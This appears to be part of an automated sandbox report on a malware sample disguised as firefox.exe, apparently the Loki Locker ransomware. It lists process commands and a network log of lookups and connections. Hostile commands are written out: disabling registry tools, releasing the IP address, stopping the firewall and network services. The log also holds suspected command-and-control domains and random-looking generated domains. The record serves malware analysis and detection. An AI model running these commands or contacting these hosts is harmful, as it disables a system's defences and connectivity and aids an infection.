C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ipconfig /release

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C net stop Windows Firewall

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\net.exe

net stop Windows Firewall

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Windows Firewall

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C net stop Network Connections

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\net.exe

net stop Network Connections

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Network Connections

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 728

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 150.171.28.11:80 edge.microsoft.com tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.230.21:443 js.hcaptcha.com udp
US 104.19.230.21:443 js.hcaptcha.com tcp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 104.19.229.21:443 newassets.hcaptcha.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 api.hcaptcha.com udp
US 8.8.8.8:53 api.hcaptcha.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
NL 108.177.119.94:443 update.googleapis.com tcp
GB 104.86.110.96:443 www.bing.com tcp
US 104.19.229.21:443 api.hcaptcha.com udp
US 104.19.229.21:443 api.hcaptcha.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 8.8.8.8:53 imgs3.hcaptcha.com udp
US 8.8.8.8:53 imgs3.hcaptcha.com udp
US 104.19.230.21:443 imgs3.hcaptcha.com udp
N/A 224.0.0.251:5353 udp
GB 104.86.110.96:443 www.bing.com udp
US 104.19.230.21:443 imgs3.hcaptcha.com udp
US 104.19.229.21:443 imgs3.hcaptcha.com udp
US 151.101.130.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 51.11.108.188:443 checkappexec.microsoft.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.190.173:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
GB 2.18.66.67:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
GB 2.18.66.72:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 2.18.27.76:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.192.193:443 i.imgur.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.27.76:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.27.76:443 www.bing.com udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 loki-locker.one udp
US 34.132.102.6:80 loki-locker.one tcp
US 34.132.102.6:80 loki-locker.one tcp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 151.101.2.49:443 bazaar.abuse.ch tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 150.171.73.11:80 edge-http.microsoft.com tcp
GB 2.18.27.76:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 34.110.138.217:443 merino.services.mozilla.com tcp
US 8.8.8.8:53 mc.prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 8.8.8.8:53 merino.services.mozilla.com udp
US 8.8.8.8:53 mc.prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.110.138.217:443 merino.services.mozilla.com udp
US 8.8.8.8:53 example.org udp
US 8.8.8.8:53 ipv4only.arpa udp
US 8.8.8.8:53 prod.detectportal.prod.cloudops.mozgcp.net udp
US 34.107.221.82:80 prod.detectportal.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.detectportal.prod.cloudops.mozgcp.net udp
GB 2.18.27.76:443 www.bing.com udp
N/A 127.0.0.1:56331 tcp
N/A 127.0.0.1:56342 tcp
US 184.164.136.134:80 tcp
US 184.164.136.134:80 tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.153.105:443 www.google.com udp
US 8.8.8.8:53 qtvghqsrkimpg.co.uk udp
US 8.8.8.8:53 rxwiivmqxhijf.info udp
US 8.8.8.8:53 rkpmnvwtllgme.com udp
US 8.8.8.8:53 soqoobqsykcgm.net udp
US 8.8.8.8:53 slamhlklmeivg.biz udp
US 8.8.8.8:53 tpboiqekadepf.ru udp
US 8.8.8.8:53 andcdonnarvog.org udp
US 8.8.8.8:53 ndelmwabwqyiw.co.uk udp
US 8.8.8.8:53 crnfoeblyeqtg.info udp
US 8.8.8.8:53 phooxmnyvdtng.com udp
US 8.8.8.8:53 cfhidjfhcnruc.net udp
US 8.8.8.8:53 puirmrruymuos.biz udp
US 8.8.8.8:53 ejrloysfbamau.ru udp
US 8.8.8.8:53 rysuxhfsxyptu.org udp
US 8.8.8.8:53 irlyeanlbxwku.co.uk udp
US 8.8.8.8:53 jvmbfixhxcwvt.info udp
US 8.8.8.8:53 kvvcppbjakrpu.com udp
US 8.8.8.8:53 laweqxlfworbd.net udp
US 8.8.8.8:53 kjpfeuffdtsqc.biz udp
US 8.8.8.8:53 lnqhfdpbaxscb.ru udp
US 8.8.8.8:53 mnaipksdcgnvu.org udp
US 8.8.8.8:53 nrbkqsdyyknhd.co.uk udp
US 8.8.8.8:53 digvoisxtdsdo.info udp
US 8.8.8.8:53 qvbhrnorekoso.com udp
US 8.8.8.8:53 ejqvirnvnlleq.net udp
US 8.8.8.8:53 rwlhlwjpxshth.biz udp
US 8.8.8.8:53 hgkvepvgdobbo.ru udp
US 8.8.8.8:53 utfhhuranvwqo.org udp
US 8.8.8.8:53 ihuvxyqewwtcx.co.uk udp
US 8.8.8.8:53 vuphbemxhepro.info udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 hyomitoimcsjr.com udp
US 8.8.8.8:53 ibjmpyihwdhda.net udp
US 8.8.8.8:53 iaymcdjggklkt.biz udp
US 8.8.8.8:53 jctmjidfqlaes.ru udp
US 8.8.8.8:53 lwsmxbrqvnbhg.org udp
US 8.8.8.8:53 mynmfglpgopbo.co.uk udp
US 8.8.8.8:53 mxdmrkmopvtip.info udp
US 8.8.8.8:53 naxmypgnawico.com udp
US 8.8.8.8:53 vhgofhburgtqr.net udp
US 8.8.8.8:53 jubaipniyhxki.biz udp
US 8.8.8.8:53 xlqrqqvfjexek.ru udp
US 8.8.8.8:53 lyldtyisqfcxk.org udp
US 8.8.8.8:53 afkouoedbrcor.co.uk udp
US 8.8.8.8:53 nsfaxwqqisgii.info udp
US 8.8.8.8:53 cjurgxynspgcr.com udp
US 8.8.8.8:53 pwpdjglbaqkvr.net udp
US 8.8.8.8:53 axofyswqkfcbr.biz udp
US 8.8.8.8:53 erzurum.us udp
US 8.8.8.8:53 bajfgbhmraiqq.ru udp
US 8.8.8.8:53 ccyikcrbcdgok.org udp
US 8.8.8.8:53 detirkcwjxmes.co.uk udp
US 8.8.8.8:53 evsfoaaytqkyg.info udp
US 8.8.8.8:53 fxnfvikublqof.com udp
US 8.8.8.8:53 gadiajujloomg.net udp
US 8.8.8.8:53 hcxihrffsjuco.biz udp
US 8.8.8.8:53 idveibbwccigl.ru udp
US 8.8.8.8:53 vqqplgwqmjevl.org udp
US 8.8.8.8:53 jegecqoodukpu.co.uk udp
US 8.8.8.8:53 wrbpfvkincgfl.info udp
US 8.8.8.8:53 kuakiicrpskls.com udp
US 8.8.8.8:53 xiuvlnxlaagbs.net udp
US 8.8.8.8:53 lvkkcxpjqlmuu.biz udp
US 8.8.8.8:53 yjfvfdldbsikl.ru udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 mteucmwhubimo.org udp
US 8.8.8.8:53 nvyujrqgfcwgw.co.uk udp
US 8.8.8.8:53 nuouvckyvtkvx.info udp
US 8.8.8.8:53 owjudhexguypw.com udp
US 8.8.8.8:53 olibctxcirkrk.net udp
US 8.8.8.8:53 pndbjyrbssyls.biz udp
US 8.8.8.8:53 pmsbvjltjkmbm.ru udp
US 8.8.8.8:53 qonbdofstlbul.org udp
US 8.8.8.8:53 bcvwyajwadsem.co.uk udp
US 8.8.8.8:53 opqicivkhewxd.info udp
US 8.8.8.8:53 dggakpwuypnjm.com udp
US 8.8.8.8:53 qtblnxjigqrdm.net udp
US 8.8.8.8:53 dtadyhkrntujt.biz udp
US 8.8.8.8:53 qhuocpwfuuydk.ru udp
US 8.8.8.8:53 fxkgkwxpmgpom.org udp
US 8.8.8.8:53 slfrnfkdthtim.co.uk udp
US 8.8.8.8:53 fsenslfsscbom.info udp
US 8.8.8.8:53 guynatpoawhel.com udp
US 8.8.8.8:53 hwoqebsqrovtm.net udp
US 8.8.8.8:53 hkitssgngsdti.ru udp
US 8.8.8.8:53 imdtabqjnnjjh.org udp
US 8.8.8.8:53 josweitlffxyb.co.uk udp
US 8.8.8.8:53 kqnwlqehmaeoj.info udp
US 8.8.8.8:53 wkpynnvmtytm.com udp
US 8.8.8.8:53 kaqkqsrrlnas.net udp
US 8.8.8.8:53 xpnqhwqnabwd.biz udp
US 8.8.8.8:53 lfockcmsrpdj.ru udp
US 8.8.8.8:53 bauqfilhfmir.org udp
US 8.8.8.8:53 opvcinhmwbox.co.uk udp
US 8.8.8.8:53 cfsiyrgiloli.info udp
US 8.8.8.8:53 puttcwcnddro.com udp
US 8.8.8.8:53 foxvoxowedrc.net udp
US 8.8.8.8:53 gsyajdikvgbm.biz udp
US 8.8.8.8:53 gtvnihjxkfus.ru udp
US 8.8.8.8:53 hxwrdmdlcied.org udp
US 8.8.8.8:53 jedngserpqgh.co.uk udp
US 8.8.8.8:53 kierbxxfhtpr.info udp
US 8.8.8.8:53 kjbfacysvsjx.com udp
US 8.8.8.8:53 lncjuhsgnvsi.net udp
US 8.8.8.8:53 hyrhfwxbyrgy.biz udp
US 8.8.8.8:53 uossifkdrmuj.ru udp
US 8.8.8.8:53 jhpkpgsidjgt.org udp
US 8.8.8.8:53 wwqvsofkveue.co.uk udp
US 8.8.8.8:53 lowywrnvkfue.info udp
US 8.8.8.8:53 yexkaaaxdajo.com udp
US 8.8.8.8:53 nwuchbidowuy.net udp
US 8.8.8.8:53 bmvnkjufhrjj.biz udp
US 8.8.8.8:53 pdaeghqajvms.ru udp
US 8.8.8.8:53 qhbibpbhcfny.org udp
US 8.8.8.8:53 rlxhqqlhnnmn.co.uk udp
US 8.8.8.8:53 spyllyvogwnt.info udp
US 8.8.8.8:53 tsfvxcguujbx.com udp
US 8.8.8.8:53 uwgaskqcnsce.net udp
US 8.8.8.8:53 vbdyilbcybbs.biz udp
US 8.8.8.8:53 wfeddtljrkcy.ru udp
US 8.8.8.8:53 lollkhsearqs.org udp
US 8.8.8.8:53 yemwnmojrgwy.co.uk udp
US 8.8.8.8:53 mtjdewgsdfdr.info udp
US 8.8.8.8:53 ajkohccxutjx.com udp
US 8.8.8.8:53 nxqaickxpvtq.net udp
US 8.8.8.8:53 bnrllhgdhkaw.biz udp
US 8.8.8.8:53 odorcrxmsjgp.ru udp
LT 5.199.171.47:80 tcp
US 8.8.8.8:53 cspdfwtrkxmv.org udp
US 8.8.8.8:53 tstilrlokvoi.co.uk udp
US 8.8.8.8:53 uwumgwfccyxs.info udp
US 8.8.8.8:53 uxrafhydnjbh.com udp
US 8.8.8.8:53 vcseamsqfmkr.net udp
US 8.8.8.8:53 vcywjmdiaarg.biz udp
US 8.8.8.8:53 wgaberwvrdbq.ru udp
US 8.8.8.8:53 whwodcqwdnef.org udp
US 8.8.8.8:53 xlxsxhkkuqnp.co.uk udp
US 8.8.8.8:53 vdntcqupfiml.info udp
US 8.8.8.8:53 jsoffyhrxdbv.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 xllwmgiqgpdx.net udp
US 8.8.8.8:53 lbmipousykri.biz udp
US 8.8.8.8:53 xmsialmjumpj.ru udp
US 8.8.8.8:53 lcttdtylnhet.org udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 auqlkbakvtgv.co.uk udp
US 8.8.8.8:53 nkrwnjmmooug.info udp
US 8.8.8.8:53 ehvqdbnopmsf.com udp
US 8.8.8.8:53 flwuxjxvivtl.net udp
US 8.8.8.8:53 gpttnqbpqtjr.biz udp
LT 5.199.171.47:80 tcp
US 8.8.8.8:53 htuxiylwjdkx.ru udp
US 8.8.8.8:53 gqbfbvfifqvd.org udp
US 8.8.8.8:53 hucjveppxawj.co.uk udp
US 8.8.8.8:53 iyyillsjgxmp.info udp
US 8.8.8.8:53 jdamgtdqyhnv.com udp
US 8.8.8.8:53 xyitjylcmwxf.net udp
US 8.8.8.8:53 lmdhgehhbihl.biz udp
US 8.8.8.8:53 yegldigdsybv.ru udp
US 8.8.8.8:53 mrbyancihkkc.org udp
US 8.8.8.8:53 conlbgokllcl.co.uk udp
US 8.8.8.8:53 pciyxlkpawlr.info udp
US 8.8.8.8:53 dtldupjlrnfc.com udp
US 8.8.8.8:53 qhgqrufqgyoi.net udp
US 8.8.8.8:53 cpqkdjilodfj.biz udp
US 8.8.8.8:53 drlmeocydysx.ru udp
US 8.8.8.8:53 duocwsdmufia.org udp
US 8.8.8.8:53 ewjexxwajbvo.co.uk udp
US 8.8.8.8:53 gfvcuqltnrjp.info udp
US 8.8.8.8:53 hhqevvfhcnwe.com udp
LT 5.199.171.47:80 tcp
US 8.8.8.8:53 hkttoaguttmg.net udp
US 8.8.8.8:53 imovpfaiipau.biz udp
US 8.8.8.8:53 inkcbinqxiqp.ru udp
US 8.8.8.8:53 vbfpxqasbove.org udp
US 8.8.8.8:53 kviflrixcaqk.co.uk udp
US 8.8.8.8:53 xjdsiauafgvy.info udp
US 8.8.8.8:53 mdptspqywwuv.com udp
US 8.8.8.8:53 aqkhpxdbadak.net udp
US 8.8.8.8:53 olnwdylgbouq.biz udp
US 8.8.8.8:53 cyikahxieuaf.ru udp
US 8.8.8.8:53 messuskoaotc.org udp
US 8.8.8.8:53 ngnuvbuvdfli.co.uk udp
US 8.8.8.8:53 omqvfcfvegtw.info udp
US 8.8.8.8:53 polxgkpdhwld.com udp
US 8.8.8.8:53 qtxkmanwydxi.net udp
US 8.8.8.8:53 rvsmnixectpo.biz udp
US 8.8.8.8:53 scvnwjieduxd.ru udp
US 8.8.8.8:53 teqpxrslglpj.org udp
US 8.8.8.8:53 mdeggskaslkq.co.uk udp
US 8.8.8.8:53 aqytdxgfhwtw.info udp
US 8.8.8.8:53 nicxaixovywp.com udp
US 8.8.8.8:53 bvwlwnttkkgv.net udp
US 8.8.8.8:53 omjuealuvyxn.biz udp
US 8.8.8.8:53 caeibfhakkht.ru udp
US 8.8.8.8:53 prhmxpyjymkm.org udp
US 8.8.8.8:53 dfcauuuonxts.co.uk udp
US 8.8.8.8:53 qtmwadhjurru.info udp
US 8.8.8.8:53 rvhybibwjnfj.com udp
US 8.8.8.8:53 rykotsuxxfet.net udp
US 8.8.8.8:53 sbfquxolmbri.biz udp
US 8.8.8.8:53 sdrlxkiexffr.ru udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 tfmnypcrmbsg.org udp
US 8.8.8.8:53 tipdravsbsrq.co.uk udp
US 8.8.8.8:53 ukkfsfpgpoff.info udp
US 8.8.8.8:53 wrgoxcmleumh.com udp
US 8.8.8.8:53 kfbcukynhbrv.net udp
US 8.8.8.8:53 yaeriramfcdt.biz udp
US 8.8.8.8:53 mnyffamoiiii.ru udp
US 8.8.8.8:53 ybldvjnghiae.org udp
US 8.8.8.8:53 mogqsraikofs.co.uk udp
US 8.8.8.8:53 bjjggybhipqq.info udp
US 8.8.8.8:53 owetdhnjlvvf.com udp
US 8.8.8.8:53 biofrmjjgbpt.net udp
US 8.8.8.8:53 ckjhsutqjrha.biz udp
US 8.8.8.8:53 dqmiccwkhigg.ru udp
US 8.8.8.8:53 eshkdkhrkyxm.org udp
US 8.8.8.8:53 drttptkejodq.co.uk udp
US 8.8.8.8:53 etovqculmfuw.info udp
US 8.8.8.8:53 farwajxfkvtd.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 gcmybrimnmlj.net udp
US 8.8.8.8:53 pfmxhcqxiaix.ru udp
US 8.8.8.8:53 dqvkegpfgesu.org udp
US 8.8.8.8:53 qgwtnllytxag.co.uk udp
US 8.8.8.8:53 gfqgprkygtpr.info udp
US 8.8.8.8:53 hgbcvbfarrha.net udp
US 8.8.8.8:53 uvclfgbtflol.biz udp
US 8.8.8.8:53 kttlyiuqvmga.ru udp
US 8.8.8.8:53 lxunanopjlct.org udp
US 8.8.8.8:53 luehfrprhkxi.co.uk udp
US 8.8.8.8:53 myfjgwjqujtc.info udp
US 8.8.8.8:53 ojydqdklhauf.com udp
US 8.8.8.8:53 pnafriekuyqy.net udp
US 8.8.8.8:53 pkjywmfmsxmn.biz udp
US 8.8.8.8:53 qokbxrylgwih.ru udp
US 8.8.8.8:53 uolhoxoffbtn.org udp
US 8.8.8.8:53 iemqxgbscawh.co.uk udp
US 8.8.8.8:53 wsvgmhjmolaq.info udp
US 8.8.8.8:53 yeqygseaqois.net udp
US 8.8.8.8:53 mtripbqnnnlm.biz udp
US 8.8.8.8:53 bibxecyhayov.ru udp
US 8.8.8.8:53 oxchnkluwxrp.org udp
US 8.8.8.8:53 dstepjodghuj.co.uk udp
US 8.8.8.8:53 ewugqryydluu.info udp
US 8.8.8.8:53 fwednsjkprbm.com udp
US 8.8.8.8:53 gbffobtgmvbx.net udp
US 8.8.8.8:53 hiyvheexrujo.biz udp
US 8.8.8.8:53 imaximotoyja.ru udp
US 8.8.8.8:53 jmjufnyfbfpr.org udp
US 8.8.8.8:53 kqkwgvjbxjpd.co.uk udp
US 8.8.8.8:53 qthbuqrvnllo.info udp
US 8.8.8.8:53 ejikevnpbfsa.com udp
US 8.8.8.8:53 rurwbgfkwvln.net udp
US 8.8.8.8:53 fksgklbekpsy.biz udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 sdmpsljpdpom.ru udp
US 8.8.8.8:53 gsnycqfjqjvx.org udp
US 8.8.8.8:53 tewlybwemaol.co.uk udp
US 8.8.8.8:53 htxuigsxatvw.info udp
US 8.8.8.8:53 yxpxvcriorqc.com udp
US 8.8.8.8:53 acqawhlhcqmv.net udp
US 8.8.8.8:53 ayatcrfwxcqb.biz udp
US 8.8.8.8:53 bhumtwjcevta.org udp
US 8.8.8.8:53 clvoucdbrupt.co.uk udp
US 8.8.8.8:53 cifiamwqngty.info udp
US 8.8.8.8:53 dmgkbrqpbfps.com udp
US 8.8.8.8:53 jshtlrltxime.net udp
US 8.8.8.8:53 wiiduaxhuhpx.biz udp
US 8.8.8.8:53 lwrsjhyufbkq.ru udp
US 8.8.8.8:53 ymscsplicank.org udp
US 8.8.8.8:53 yrnrsupbklsv.info udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 ngwhhcqoufno.com udp
US 8.8.8.8:53 bvxqqkdcreqi.net udp
US 8.8.8.8:53 rwpqmdlryona.biz udp
US 8.8.8.8:53 sbqsnlvnvsnl.ru udp
US 8.8.8.8:53 tbapksysghlm.org udp
US 8.8.8.8:53 ufbrlbjodllx.co.uk udp
US 8.8.8.8:53 tgufkxdlosqx.info udp
US 8.8.8.8:53 ukvhlgnhlwqj.com udp
US 8.8.8.8:53 vkfeinqmvlok.net udp
US 8.8.8.8:53 woggjvbispov.biz udp
US 8.8.8.8:53 deejtiohnvmu.ru udp
US 8.8.8.8:53 qryuwnkbxdik.org udp
US 8.8.8.8:53 efofarjiyted.co.uk udp
US 8.8.8.8:53 rsjqdwfcjbas.info udp
US 8.8.8.8:53 htjblprpmkqb.com udp
US 8.8.8.8:53 iutwrymqxiij.biz udp
US 8.8.8.8:53 vioiueikipey.ru udp
US 8.8.8.8:53 humantkrgumb.org udp
US 8.8.8.8:53 iwhauyeqqvbu.co.uk udp
US 8.8.8.8:53 ivwvtdfsrsej.info udp
US 8.8.8.8:53 jxrvbiyrctsd.com udp
US 8.8.8.8:53 lkrrfbnafjqh.net udp
US 8.8.8.8:53 mmmrmghypkfb.biz udp
US 8.8.8.8:53 mlcnlkibqhip.ru udp
US 8.8.8.8:53 nnwnspcabiwj.org udp
US 8.8.8.8:53 vdeckjiiejyx.co.uk udp
US 8.8.8.8:53 fxaaurfmehhgx.com udp
US 8.8.8.8:53 fwdmvcmrsapfy.net udp
US 8.8.8.8:53 gyckyhgyfdclx.biz udp
US 8.8.8.8:53 gfgudtldumdfl.ru udp
US 8.8.8.8:53 hhfsgyfkhpplt.org udp
US 8.8.8.8:53 hgifhjmpvixkn.co.uk udp
GB 2.18.27.76:443 www.bing.com udp
